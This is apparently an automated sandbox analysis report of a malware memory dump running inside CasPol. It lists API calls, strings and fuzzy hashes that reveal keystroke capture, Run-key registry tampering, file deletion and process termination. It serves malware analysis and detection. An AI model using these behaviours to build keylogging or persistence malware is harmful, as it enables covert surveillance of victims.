                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog
                                                                                                            • String ID: T=G$T=G
                                                                                                            • API String ID: 3519838083-3732185208
                                                                                                            • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                            • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                                            • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                                            • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                                              • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                            • String ID: [AltL]$[AltR]
                                                                                                            • API String ID: 2738857842-2658077756
                                                                                                            • Opcode ID: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                                                                                                            • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                                            • Opcode Fuzzy Hash: 3060760f9439b7e306d49c13d8f75930fa0495ce116598ddfd2946cd15ffa226
                                                                                                            • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00448825
                                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                                            • String ID: `@$`@
                                                                                                            • API String ID: 1353095263-20545824
                                                                                                            • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                            • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                            • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                            • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                            APIs
                                                                                                            • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: State
                                                                                                            • String ID: [CtrlL]$[CtrlR]
                                                                                                            • API String ID: 1649606143-2446555240
                                                                                                            • Opcode ID: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                                                                                                            • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                            • Opcode Fuzzy Hash: 5e7418163892c1745ec9138d14110a374d5f1712bd724f4894496e05d56ee1c7
                                                                                                            • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                            • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteOpenValue
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                            • API String ID: 2654517830-1051519024
                                                                                                            • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                            • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                            • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                            • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteDirectoryFileRemove
                                                                                                            • String ID: pth_unenc
                                                                                                            • API String ID: 3325800564-4028850238
                                                                                                            • Opcode ID: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                                                                                                            • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                            • Opcode Fuzzy Hash: b9b9920c625181ca6de104178518fd5ce2cfe10458045dbf61cc06549d32ecb0
                                                                                                            • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                            APIs
                                                                                                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                            • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ObjectProcessSingleTerminateWait
                                                                                                            • String ID: pth_unenc
                                                                                                            • API String ID: 1872346434-4028850238
                                                                                                            • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                            • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                            • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                            • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                            • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1717984340-0
                                                                                                            • Opcode ID: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                                                                                                            • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                            • Opcode Fuzzy Hash: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                                                                                                            • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759